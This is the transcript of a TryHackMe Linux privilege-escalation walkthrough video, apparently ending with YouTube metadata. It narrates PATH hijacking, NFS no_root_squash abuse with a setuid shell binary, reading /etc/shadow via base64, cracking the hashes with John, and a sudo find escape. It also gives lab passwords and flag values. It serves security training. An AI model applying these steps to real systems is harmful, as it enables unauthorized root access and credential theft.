to go ahead and put that in there right so first things first we'll have to obviously create that right all right so sorry i'm just looking for which one or what the executable we're going to create is the actual um binary um so we can actually we can look at this thm.pi because i don't even know what that is um thm.pi i never looked at that in the last one i just created one so we'll go ahead and see okay so this looks like it's actually just a python script running okay cool okay so now we're going to actually what we're going to do is we're actually going to create a script named thm so vim th okay because that's the file it needs so there's different ways to do this this is the way i like to do it bin bash okay and then we'll go ahead and say what do we want to say we want it to give us a root basically a root um access is what we really want but we don't have to do that to save us some time we can actually do this we can actually say sudo sue because it's allowed to switch to a root user okay and we can actually just leave it at that if we want to and just say whatever you know so let's see if if it does if that works let's see if that saves okay so now if we run the python we still can't do freaking up so now if we run the test okay so it's still looking for thm so we need to change that permission probably because it probably can't execute it and we're going to say th in and now we're going to say okay so thm not found the reason for that is we need it to be in one of these paths most likely right the one that we need so let's go ahead and find the one that we need all right so what we need to do we need to add that so we need to export and what we're doing is we're adding that path that we already know exists the these ones up here we need to add his home directory home murdock and path now what this is going to do it's going to tell the application that this is in the path and to look through this path for the ta gym which is what it's looking for okay and you see right there it's look it looked for thm in our paths and it found it and look now it says root so now we're root all because all we did was sudo su so now we can actually look for that flag so find actually we're not going to look for it because of the time because i know it's taking forever so we're just going to cat it so cat i know where it is so home matt flag6 dot txt all right there it is so it's in matt's home directory which is simple hopefully that made sense you guys i know i i kind of got confused there for a second when uh because on my other one i did it and then when i did this before i did it in the temporary directory um so i was confused as to um why i wasn't seeing the temporary directory in here but it's because i created it at the beginning last time rather than the end so hopefully that didn't confuse you guys but basically if you're trying to figure out what i did all it was was you have right permissions or you have permissions to the paths here if you can directly find out um which paths you have right permissions to then write to them and then add that path in an application that you run will look in that path in the paths that you have access to and look for whatever it's trying to run so you could be able to change so you could basically create a secondary script that it calls upon which is what we did there all right um this one nfs privilege escalation this one's pretty simple um this one i don't think is is nearly as complex as some of the other um examples but we'll go ahead and and cover it anyway basically long story short what we're doing here is network file shares we're looking to mount one of the file shares that's supposed to be a network file share right we're going to mount it to our computer when we mount it to our computer we now can control the permissions so we can give it sudo permissions so that we can run sudo permissions on that network file share which then run on the server that it's sitting on most of the time this is going to be disabled but if it's not meaning that so what we're looking for when we look at them here is if we see it no root squash that's right there right what we're looking for no root squash so what that means is if they don't have that it means that we can actually or if they have i'm sorry um it means that we can actually run it and create our own executable with the s uid bit meaning when we run it on the target system it runs as sudo it allows us to do it from our side no matter what permissions are set on the on the other side okay so keep that in mind it's not as common anymore because it's extremely insecure right if if i can if you can set your the permissions for files on your box what's the point of me setting any any permissions right so that's why it's not really secure but that's all right all right so karen we're back at it with karen again karen at 10.10.27.143 yes all right we're in it so what we're going to do is we're going to look at the cat or we're going to cat excuse me the etsy exports which is going to show us the file shares and you can see here these are examples they're commented out so don't worry about those but you can see you've got home backup and temp and then the shared folder the temp has no root squash so i'm just going to use the temp folder you can use any of these three if you wanted to i just personally like using the temp folder that's just me so what we're gonna do is we have to go we don't have to go on here but i like to go on here and uh ls i like to go to cd temp and then i like to create so make a directory temp cd temp whoops cd temp all right so i like to be in a temporary directory if i'm going to do this because i know i'm going to basically delete this um and so what i'm going to do is i'm going to say okay there's a couple commands we can do we see here that what they've got but we can actually do a show mount so this is going to show us what is actually mountable and we can do this excuse me i did that for the wrong box we can say show mount okay and what we're doing is we're going to basically request they tell us what what machine is or what uh shares do you have that are mountable meaning which ones can we mount to our machine as a network share and if we hit it there's our temp right there so that's the one we're going to target now we already made the directory that i want to create it for so now we're going to say okay let's mount it amount 10.10.27.143. okay and then it's important that you do you know which one you're looking at and we're looking at just temp and then we're going to just go ahead and say temp temp okay now if we hit ls we have to back up one now if we go to cd temp ls you can see that we actually have things in here and those are the same things that should be in their temp folder same exact things so now if we create a script in here we can set the permissions on our machine as a network file share and then run it on the target machine hopefully that makes sense to you guys so this is our machine and we're going to try and get it to where we can run it on their machine so now we're going to create the payload this is super simple this is the same ones that we've done we're going to do the same ones that they have over here uh i know this they have right here this main so we're gonna i'm just gonna do it on here because we can save it wherever we want all right so all we gotta do do do and you can always find these um pretty much anywhere set all right set uid all right and then system we just need to specify what we want and we want the bin bash all right and it's finishing it for us so that's good that's usually a good sign when it when it knows the coding language and it's finishing it for you it means that you're doing it correctly usually alright so file save as and we're going to say we'll just save this as nfs for network file share and we'll actually go to other locations computer temp temp and we'll save it in here so now save it now we've saved it now we need to actually look at it and we need to set that um suid because if we don't then it can't run the way that we need it to so first thing we want to do is we need to actually compile it because it is a it does take a comp if i could talk it does take a compiler so we need to go ahead and compile it so we want nfs first we gotta i forgot to save it with a dot c so we'll move it nfs to nfs.c okay now we'll go ahead and compile it now the dot c just specifies that it needs compiled so that's just the type of file that it is so keep that in mind that it does need that all right and then we're going to write it out to um nfs just regular nfs is fine and then and you guys can name them whatever you want you don't have to name them anything all right so now we do want to change it to actually make the owner root and you don't have to necessarily make the owner root i don't believe but excuse me i do i do think it's best practice on these just so that you don't run into any issues now the change mod has changed is obviously necessary to add the um the suid bit that we've been looking for okay so hopefully this makes sense to you guys but now this nfs we just did all that from our machine but it's because we haven't mounted to that network drive all we got to do is go over here on theirs okay and we can actually we should be able to run this simply as um as us right we should be able to run this and it should run as root because and you can see right there we've got root access now what it is is because we're using that same set uid but we just set it from our machine because it gave us that permission it allowed us to do that so that's all it's doing now how many mountable shares can you identify on the target there's three you can see that back here it was the um temp the what was it home ubuntu share folder and home backup how many shares have the no root all of them do so three gain a root shell we did that now what's the content of the flag so cd home cd matt probably yep catflag7.txt and there's our flag number seven now the capstone challenge this one they just give you basically nothing and you'll see it's it's pretty easy after you've done all these boxes you'll you'll see that they they gave you a pretty easy one which i like because we've been going for an hour and 16 and i've been trying to rush through it um which is kind of why i've been all over the place um this is why i thought about breaking the video up into two but that's okay this this is fine um because i this is one of those things if you do the work meaning you actually sit here and you do it you'll understand it if you don't you won't so if you just watch it and then go finish the box you're not going to understand this anyway so i'm not not necessarily directing these to those people all right so now the capstone challenge we've got to log in now we have leonard and penny so we no longer have the silly freaking um the silly karen we've got leonard and penny so this one it's kind of a different a step process which i like because this is more of a realistic of what you'd be looking at as far as um in a real situation you're not going to be in a real situation it's not going to be necessarily as easy as we've seen you're going to kind of have a little bit of struggles and i think this is a little bit good night a little bit more of a better example because there's multiple steps in it all right so ssh into leonard and it may take a sec because it may not be up all the way yet dude maybe we'll see all right now i will tell you guys i'm not gonna look for kernel exploits in this like i would normally like i would normally start searching for them and doing things like that um looking for version numbers and stuff i'm not gonna do that because of the time factor but normally that's what i would recommend doing we already know what we're trying to do so i wouldn't get too crazy worried about that but i would worry about why we can't ssh into it 10 10 64 144 yep okay well while that's figuring itself out we'll go ahead and talk about it um so basically first thing we're going to do on this one is the same thing we did on i believe it was the either the pseudo or the su id i can't remember which one we did but basically we're gonna go ahead and we're gonna look for um the suid bit set which is the same thing we did before and the base 64 on this one allows us to use base 64 again so ssh leonard at 10.10.64.144. i have no idea why ssh isn't working on it of course it's gonna do it now there we go okay and then his password is penny one two three and we're just gonna do that instead of this because that one wasn't working okay so we're in as leonard so first thing we would do is we would just do the same thing we normally do enumerate and find the the fault now the fault first one i found is the base64 so we can do the base64 just like before so base64 and we're going to say etsy shadow and then base 64. decode and you can see that we get all these options now you don't necessarily have to save all of them or sorry not save all them you don't necessarily have to copy all of them you can copy one or two but i like to have them all um so we'll paste this this is the shadow file so save as and i will save it under desktop just to make it easy and i'll save this as shadow.txt okay and then from there we'll go ahead and do the password so we can do that exact same one but instead of shadow do password and take that now make sure you don't go too far because uh earlier i went too far and i started copying the um the shadow file again so keep that in mind um paste file save as and we're going to go back to desktop and we'll say password dot txt okay so we've got those two that's that's perfect we'll go ahead and minimize that for a second whoops open new terminal i don't like that i'll open a new tab all right so we've got the base64 we've got that we're good we're good we're good we got the now we need to go ahead and unshadow password well first let's just go to our desktop and then there we go so now sudo we don't even need pseudo because we're already root so unshadow password dot txt and shadow dot txt and we'll say cracked dot txt like we did before boom now we just need to go to john word lists equals and we'll say user share word list rock you if you guys are wondering this is the location for the rock you every single time and we're going to name it or we're going to use our crack.txt and we'll let it run and hopefully this will find it well there's missy's password so we have missy's password right there so we can log in as missy so they're perfect so now let's go ahead back here and let's go ahead and switch user missy and her password was password1 and by the way you can actually um if you feel froggy you could just guess that um so now we're going to say ls let's see find actually i'm not even going to look for it i'm just going to go into it cd documents but normally you would find it cat flag one dot txt all right and there it is so thm four two eight two four two eight two eight seven one nine nine two zero five four four all right there's the first flag now the problem is we still don't have root permissions we could sit here and wait for this and it might eventually get the root password i don't know if it's in there um but that's not what we want to do so now what do we have to do well that's pretty easy we just have to find um let's see we just have to figure out what he what they can run as sudo which i'm not gonna necessarily waste the time with you guys we've already done this it's the find command you can actually use the find command again so go ahead and use the sudo find like we did before except for you're gonna go ahead and go on gtfo bins and look for this find command and find what you can run with it so we're gonna do find and this is just in the presence of time guys i normally would go through all this but we've already covered it time or two or three times by the time we get to the end i'm not gonna keep covering it um so there's been shell and then the quit boom and you'll see that we now have who am i and we have root so now we can find the um regular flag which is okay there it is flag oh that's flag one excuse me so cd home route cd home okay root flag smooth all right so now cat flag2.txt and there it is guys so it's thm one six eight eight two four seven eight two three nine zero two three eight that's it guys hopefully you guys like this i know it's really long there's a lot to watch but i really did take my time on this to try and find the best way i even wrote it up over here for me to find the best way to explain things to you guys while also still letting you guys do it and also not my biggest concern here was trying to um get all the knowledge there without making this video five hours right because you could dive into these so much deeper but i think it's important that you guys understand it and know how to research it not how to memorize it which i think is important so hopefully you guys like it if you did subscribe like it this was a really long video to make um it took me like probably nine or ten hours to make because i had to do the boxes then find a way to make it make sense on a video then record it so on so forth so hopefully you guys liked it this was a very long video but i definitely think it's really good information and we have one more video guys and then we're done with the freaking series so let's go thank you guys and i really appreciate it we're reached 300 subs so let's go guys thank you so much

Info

Channel: stuffy24

Views: 17,189

Rating: undefined out of 5

Keywords: pc, linux, computer, hacker, try, hack, me, be, try hack me linux, hacked, pawned, pwnd, hacking, email, port, scans, common, ftp, rdp, https, SSH, vulnerability, metasploit, framework, meta, sploit, exploit, exploitation, meterpreter, what, the, shell, thm, privelage, escalation, privEsc, enumeration, try hack me walkthrough, try hack me privilege escalation, linux operating system, linux privilege escalation tryhackme, linux privilege escalation, linux privilege escalation suid, try hack me beginner, try hack me review

Id: cRLDmWWyblQ

Channel Id: undefined

Length: 86min 17sec (5177 seconds)

Published: Wed Feb 23 2022